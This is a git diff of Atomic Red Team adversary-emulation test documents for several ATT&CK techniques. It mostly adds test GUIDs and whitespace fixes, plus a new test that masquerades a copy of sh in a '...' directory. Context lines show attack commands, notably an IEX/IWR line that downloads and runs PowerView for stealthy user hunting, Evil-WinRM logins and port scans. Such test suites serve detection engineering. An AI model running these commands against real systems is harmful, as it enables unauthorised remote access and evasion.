+if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -135,10 +147,14 @@ This technique is used by post-exploitation frameworks.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d41aaab5-bdfe-431d-a3d5-c29e9136ff46
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Remote computer to receive the copy and execute the file | String | output.txt|
 | command_to_execute | Command to execute for output. | String | hostname|
diff --git a/atomics/T1021.003/T1021.003.md b/atomics/T1021.003/T1021.003.md
index 2ddef964..a51150c8 100644
--- a/atomics/T1021.003/T1021.003.md
+++ b/atomics/T1021.003/T1021.003.md
@@ -27,10 +27,14 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | Name of Computer | string | localhost|
 
diff --git a/atomics/T1021.006/T1021.006.md b/atomics/T1021.006/T1021.006.md
index 9dca5875..4a0d0636 100644
--- a/atomics/T1021.006/T1021.006.md
+++ b/atomics/T1021.006/T1021.006.md
@@ -23,6 +23,10 @@ Upon successful execution, powershell will "Enable-PSRemoting" allowing for remo
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9059e8de-3d7d-4954-a322-46161880b9cf
+
+
+
 
 
 
@@ -49,10 +53,14 @@ Upon successful execution, powershell will execute ipconfig on localhost using `
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5295bd61-bd7e-4744-9d52-85962a4cf2d6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | host_name | Remote Windows Host Name | String | localhost|
 | remote_command | Command to execute on remote Host | String | ipconfig|
@@ -79,10 +87,14 @@ An adversary may attempt to use Evil-WinRM with a valid account to interact with
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | Username | string | Domain&#92;Administrator|
 | destination_address | Remote Host IP or Hostname | string | Target|
@@ -103,7 +115,7 @@ evil-winrm -i #{destination_address} -u #{user_name} -p #{password}
 ##### Description: Computer must have Ruby Installed
 ##### Check Prereq Commands:
 ```powershell
-if (ruby -v) {exit 0} else {exit 1} 
+if (ruby -v) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -114,7 +126,7 @@ Start-Process $file1 /S;
 ##### Description: Computer must have Evil-WinRM installed
 ##### Check Prereq Commands:
 ```powershell
-if (evil-winrm -h) {exit 0} else {exit 1} 
+if (evil-winrm -h) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1027.001/T1027.001.md b/atomics/T1027.001/T1027.001.md
index f7e9f706..efb354ce 100644
--- a/atomics/T1027.001/T1027.001.md
+++ b/atomics/T1027.001/T1027.001.md
@@ -19,10 +19,14 @@ Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expe
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
 
@@ -45,7 +49,7 @@ rm #{file_to_pad}
 ##### Description: The binary must exist on disk at specified location (#{file_to_pad})
 ##### Check Prereq Commands:
 ```bash
-if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; 
+if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
diff --git a/atomics/T1027.002/T1027.002.md b/atomics/T1027.002/T1027.002.md
index 4a353029..8f8c16f1 100644
--- a/atomics/T1027.002/T1027.002.md
+++ b/atomics/T1027.002/T1027.002.md
@@ -24,10 +24,14 @@ No other protection/compression were applied.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 11c46cd8-e471-450e-acb8-52a1216ae6a4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx|
 
@@ -60,10 +64,14 @@ by some methods, and especially UPX is not able to uncompress it any more.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** f06197f8-ff46-48c2-a0c6-afc1b50665e1
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed|
 
@@ -94,10 +102,14 @@ No other protection/compression were applied.
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** b16ef901-00bb-4dda-b4fc-a04db5067e20
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx|
 
@@ -130,10 +142,14 @@ by some methods, and especially UPX is not able to uncompress it any more.
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 4d46e16b-5765-4046-9f25-a600d3e65e4d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed|
 
diff --git a/atomics/T1027.004/T1027.004.md b/atomics/T1027.004/T1027.004.md
index c5d39e0b..004bcf72 100644
--- a/atomics/T1027.004/T1027.004.md
+++ b/atomics/T1027.004/T1027.004.md
@@ -20,10 +20,14 @@ Upon execution an exe named T1027.004.exe will be placed in the temp folder
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ffcdbd6a-b0e8-487d-927a-09127fe9a206
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Output compiled binary | Path | C:&#92;Windows&#92;Temp&#92;T1027.004.exe|
 | input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder&#92;T1027.004&#92;src&#92;calc.cs|
@@ -47,7 +51,7 @@ del #{output_file} >nul 2>&1
 ##### Description: C# file must exist on disk at specified location (#{input_file})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{input_file}) {exit 0} else {exit 1} 
+if (Test-Path #{input_file}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -70,10 +74,14 @@ Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 453614d8-3ba6-4147-acc0-7ec4b3e1faef
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | exe program containing dynamically compiled C# code | Path | PathToAtomicsFolder&#92;T1027.004&#92;bin&#92;T1027.004_DynamicCompile.exe|
 
@@ -92,7 +100,7 @@ Invoke-Expression #{input_file}
 ##### Description: exe file must exist on disk at specified location (#{input_file})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{input_file}) {exit 0} else {exit 1} 
+if (Test-Path #{input_file}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
index 9f34ff74..e40093ff 100644
--- a/atomics/T1027/T1027.md
+++ b/atomics/T1027/T1027.md
@@ -33,6 +33,10 @@ Upon successful execution, sh will execute art.sh, which is a base64 encoded com
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** f45df6be-2e1e-4136-a384-8f18ab3826fb
+
+
+
 
 
 
@@ -62,10 +66,14 @@ Upon successful execution, powershell will execute an encoded command and stdout
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a50d5a97-2531-499e-a1de-5544c74432c6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
 
@@ -97,10 +105,14 @@ Upon successful execution, powershell will execute encoded command and read/writ
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 450e7218-7915-4be4-8b9b-464a49eafcec
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | registry_key_storage | Windows Registry Key to store code | String | HKCU:Software&#92;Microsoft&#92;Windows&#92;CurrentVersion|
 | powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
@@ -138,10 +150,14 @@ Mimic execution of compressed executable. When successfully executed, calculator
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f8c8a909-5f29-49ac-9244-413936ce6d1f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url_path | url to download Exe | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip|
 
@@ -166,7 +182,7 @@ del /Q "%temp%\T1027.zip" >nul 2>nul
 ##### Description: T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} 
+if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -188,10 +204,14 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path of the XLSM file | path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
 | sender | sender email | string | test@corp.com|
@@ -221,10 +241,14 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e2d85e66-cb66-4ed7-93b1-833fc56c9319
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path of the XLSM file | path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
 | ip_address | Destination IP address | string | 127.0.0.1|
diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md
index db1e43f3..77b26949 100644
--- a/atomics/T1030/T1030.md
+++ b/atomics/T1030/T1030.md
@@ -15,10 +15,14 @@ Take a file/directory, split it into 5Mb chunks
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_name | File name | Path | T1030_urandom|
 | folder_path | Path where the test creates artifacts | Path | /tmp/T1030|
@@ -43,7 +47,7 @@ if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
 ##### Description: The file must exist for the test to run.
 ##### Check Prereq Commands:
 ```sh
-if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; 
+if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md
index 9c9b5bfe..a491d1e9 100644
--- a/atomics/T1033/T1033.md
+++ b/atomics/T1033/T1033.md
@@ -24,10 +24,14 @@ Additionally, two files will be written to disk - computers.txt and usernames.tx
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4c4959bf-addf-4b4a-be86-8d09cc1857aa
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | Name of remote computer | string | localhost|
 
@@ -62,6 +66,10 @@ Upon successful execution, sh will stdout list of usernames.
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c
+
+
+
 
 
 
@@ -88,6 +96,10 @@ Find existing user session on other computers. Upon execution, information about
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 29857f27-a36f-4f7e-8084-4557cd6207ca
+
+
+
 
 
 
@@ -95,6 +107,7 @@ Find existing user session on other computers. Upon execution, information about
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
 ```
 
diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml
index 98369491..2628605d 100644
--- a/atomics/T1033/T1033.yaml
+++ b/atomics/T1033/T1033.yaml
@@ -48,5 +48,6 @@ atomic_tests:
   - windows
   executor:
     command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
     name: powershell
diff --git a/atomics/T1036.003/T1036.003.md b/atomics/T1036.003/T1036.003.md
index 53f7811f..c2f528f3 100644
--- a/atomics/T1036.003/T1036.003.md
+++ b/atomics/T1036.003/T1036.003.md
@@ -33,6 +33,10 @@ Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest,
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5ba5a3d1-cf3c-4499-968a-a93155d1f717
+
+
+
 
 
 
@@ -64,6 +68,10 @@ Upon successful execution, sh is renamed to `crond` and executed.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556
+
+
+
 
 
 
@@ -95,6 +103,10 @@ Upon successful execution, cscript.exe is renamed as notepad.exe and executed fr
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3a2a578b-0a01-46e4-92e3-62e2859b42f0
+
+
+
 
 
 
@@ -126,6 +138,10 @@ Upon execution, no windows will remain open but wscript will have been renamed t
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 24136435-c91a-4ede-9da1-8b284a1c1a23
+
+
+
 
 
 
@@ -157,6 +173,10 @@ Upon successful execution, powershell.exe is renamed as taskhostw.exe and execut
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
+
+
+
 
 
 
@@ -188,10 +208,14 @@ Upon successful execution, powershell will execute T1036.003.exe as svchost.exe
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** bc15c13f-d121-4b1f-8c7d-28d95854d086
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | outputfile | path of file to execute | path | ($env:TEMP + "&#92;svchost.exe")|
 | inputfile | path of file to copy | path | PathToAtomicsFolder&#92;T1036.003&#92;bin&#92;T1036.003.exe|
@@ -217,7 +241,7 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore
 ##### Description: Exe file to copy must exist on disk at specified location (#{inputfile})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{inputfile}) {exit 0} else {exit 1} 
+if (Test-Path #{inputfile}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -237,10 +261,14 @@ Copies a windows exe, renames it as another windows exe, and launches it to masq
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c3d24a39-2bfe-4c6a-b064-90cd73896cb0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | outputfile | path of file to execute | path | ($env:TEMP + "&#92;svchost.exe")|
 | inputfile | path of file to copy | path | $env:ComSpec|
@@ -276,6 +304,10 @@ Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
+
+
+
 
 
 
@@ -308,10 +340,14 @@ e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c7fa0c3b-b57f-4cba-9118-863bf4e653fc
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | exe_path | path to exe to use when creating masquerading files | path | C:&#92;Windows&#92;System32&#92;calc.exe|
 | vbs_path | path of vbs to use when creating masquerading files | path | PathToAtomicsFolder&#92;T1036.003&#92;src&#92;T1036.003_masquerading.vbs|
diff --git a/atomics/T1036.004/T1036.004.md b/atomics/T1036.004/T1036.004.md
index e6448421..cc23c8db 100644
--- a/atomics/T1036.004/T1036.004.md
+++ b/atomics/T1036.004/T1036.004.md
@@ -19,6 +19,10 @@ Creating W32Time similar named service (win32times) using schtasks just like thr
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
+
+
+
 
 
 
@@ -48,6 +52,10 @@ Creating W32Time similar named service (win32times) using sc just like threat ac
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b721c6ef-472c-4263-a0d9-37f1f4ecff66
+
+
+
 
 
 
diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md
new file mode 100644
index 00000000..906ddca2
--- /dev/null
+++ b/atomics/T1036.005/T1036.005.md
@@ -0,0 +1,51 @@
+# T1036.005 - Match Legitimate Name or Location
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/005)
+<blockquote>Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
+
+Adversaries may also use the same icon of the file they are trying to mimic.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)
+
+
+<br/>
+
+## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.
+Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
+
+**Supported Platforms:** macOS, Linux
+
+
+**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| test_message | Test message to echo out to the screen | String | Hello from the Atomic Red Team test T1036.005#1|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+mkdir $HOME/...
+cp $(which sh) $HOME/...
+$HOME/.../sh -c "echo #{test_message}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f $HOME/.../sh
+rmdir $HOME/.../
+```
+
+
+
+
+
+<br/>
diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml
new file mode 100644
index 00000000..2dc6b7b9
--- /dev/null
+++ b/atomics/T1036.005/T1036.005.yaml
@@ -0,0 +1,30 @@
+---
+attack_technique: T1036.005
+display_name: 'Masquerading: Match Legitimate Name or Location'
+
+atomic_tests:
+- name: Execute a process from a directory masquerading as the current parent directory.
+  auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
+  description: |
+    Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
+
+  supported_platforms:
+    - macos
+    - linux
+
+  input_arguments:
+    test_message:
+      description: Test message to echo out to the screen
+      type: String
+      default: Hello from the Atomic Red Team test T1036.005#1
+
+  executor:
+    name: sh
+    elevation_required: false
+    command: |
+      mkdir $HOME/...
+      cp $(which sh) $HOME/...
+      $HOME/.../sh -c "echo #{test_message}"
+    cleanup_command: |
+      rm -f $HOME/.../sh
+      rmdir $HOME/.../
diff --git a/atomics/T1036.006/T1036.006.md b/atomics/T1036.006/T1036.006.md
index e8191189..6a9c6ddc 100644
--- a/atomics/T1036.006/T1036.006.md
+++ b/atomics/T1036.006/T1036.006.md
@@ -19,6 +19,10 @@ Space After Filename
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 89a7dd26-e510-4c9f-9b15-f3bae333360f
+
+
+
 
 
 #### Run it with these steps! 
diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md
index b426a16f..7c5ef536 100644
--- a/atomics/T1036/T1036.md
+++ b/atomics/T1036/T1036.md
@@ -17,6 +17,10 @@ It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a n
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 51005ac7-52e2-45e0-bdab-d17c6d4916cd
+
+
+
 
 
 
diff --git a/atomics/T1037.001/T1037.001.md b/atomics/T1037.001/T1037.001.md
index c1163486..40211c19 100644
--- a/atomics/T1037.001/T1037.001.md
+++ b/atomics/T1037.001/T1037.001.md
@@ -18,10 +18,14 @@ that can be viewed in the Registry Editor.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d6042746-07d4-4c92-9ad8-e644c114a231
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_path | Path to .bat file | String | %temp%&#92;art.bat|
 | script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%&#92;desktop&#92;T1037.001-log.txt|
diff --git a/atomics/T1037.002/T1037.002.md b/atomics/T1037.002/T1037.002.md
index b5745668..145b05de 100644
--- a/atomics/T1037.002/T1037.002.md
+++ b/atomics/T1037.002/T1037.002.md
@@ -17,6 +17,10 @@ Mac logon script
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** f047c7de-a2d9-406e-a62b-12a09d9516f4
+
+
+
 
 
 #### Run it with these steps! 
diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md
index 5e258a38..d7876f5e 100644
--- a/atomics/T1037.004/T1037.004.md
+++ b/atomics/T1037.004/T1037.004.md
@@ -27,6 +27,10 @@ Modify rc.common
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 97a48daa-8bca-4bc0-b1a9-c1d163e762de
+
+
+
 
 
 
@@ -51,6 +55,10 @@ Modify rc.common
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+
+
+
 
 
 
@@ -83,6 +91,10 @@ Modify rc.local
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 126f71af-e1c9-405c-94ef-26a47b16c102
+
+
+
 
 
 
diff --git a/atomics/T1037.005/T1037.005.md b/atomics/T1037.005/T1037.005.md
index 808ac4eb..278fe1fc 100644
--- a/atomics/T1037.005/T1037.005.md
+++ b/atomics/T1037.005/T1037.005.md
@@ -21,6 +21,10 @@ Modify or create an file in /Library/StartupItems
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 134627c3-75db-410e-bff8-7a920075f198
+
+
+
 
 
 
diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md
index b1a21362..e2076782 100644
--- a/atomics/T1040/T1040.md
+++ b/atomics/T1040/T1040.md
@@ -27,10 +27,14 @@ Upon successful execution, tshark or tcpdump will execute and capture 5 packets
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 7fe741f7-b265-4951-a7c7-320889083b3e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | interface | Specify interface to perform PCAP on. | String | ens33|
 
@@ -50,7 +54,7 @@ tshark -c 5 -i #{interface}
 ##### Description: Check if at least one of the tools are installed on the machine.
 ##### Check Prereq Commands:
 ```bash
-if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; 
+if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -71,10 +75,14 @@ Upon successful execution, tshark or tcpdump will execute and capture 5 packets
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 9d04efee-eff5-4240-b8d2-07792b873608
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | interface | Specify interface to perform PCAP on. | String | en0A|
 
@@ -94,7 +102,7 @@ if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
 ##### Description: Check if at least one of the tools are installed on the machine.
 ##### Check Prereq Commands:
 ```bash
-if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; 
+if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -116,10 +124,14 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a5b2f6a0-24b4-493e-9590-c699f75723ca
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | interface | Specify interface to perform PCAP on. | String | Ethernet|
 | wireshark_url | wireshark installer download URL | url | https://1.eu.dl.wireshark.org/win64/Wireshark-win64-3.4.5.exe|
@@ -142,7 +154,7 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
 ##### Description: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
 ##### Check Prereq Commands:
 ```powershell
-if (test-path "#{tshark_path}") {exit 0} else {exit 1} 
+if (test-path "#{tshark_path}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -152,7 +164,7 @@ Start-Process $env:temp\wireshark_installer.exe /S
 ##### Description: npcap must be installed.
 ##### Check Prereq Commands:
 ```powershell
-if (test-path "#{npcap_path}") {exit 0} else {exit 1} 
+if (test-path "#{npcap_path}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -173,6 +185,10 @@ After execution you should find a file named trace.etl and trace.cab in the temp
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b5656f67-d67f-4de8-8e62-b5581630f528
+
+
+
 
 
 
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md
index 6da6944c..c97b6af1 100644
--- a/atomics/T1046/T1046.md
+++ b/atomics/T1046/T1046.md
@@ -25,6 +25,10 @@ Upon successful execution, sh will perform a network connection against a single
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 68e907da-2539-48f6-9fc9-257a78c05540
+
+
+
 
 
 
@@ -54,10 +58,14 @@ Upon successful execution, sh will utilize nmap, telnet, and nc to contact a sin
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 515942b0-a09f-4163-a7bb-22fefb6f185f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | host | Host to scan. | string | 192.168.1.1|
 | port | Ports to scan. | string | 80|
@@ -80,7 +88,7 @@ nc -nv #{host} #{port}
 ##### Description: Check if nmap command exists on the machine
 ##### Check Prereq Commands:
 ```sh
-if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; 
+if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -99,10 +107,14 @@ Scan ports to check for listening ports for the local host 127.0.0.1
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | nmap_url | NMap installer download URL | url | https://nmap.org/dist/nmap-7.80-setup.exe|
 | host_to_scan | The host to scan with NMap | string | 127.0.0.1|
@@ -122,7 +134,7 @@ nmap #{host_to_scan}
 ##### Description: NMap must be installed
 ##### Check Prereq Commands:
 ```powershell
-if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} 
+if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
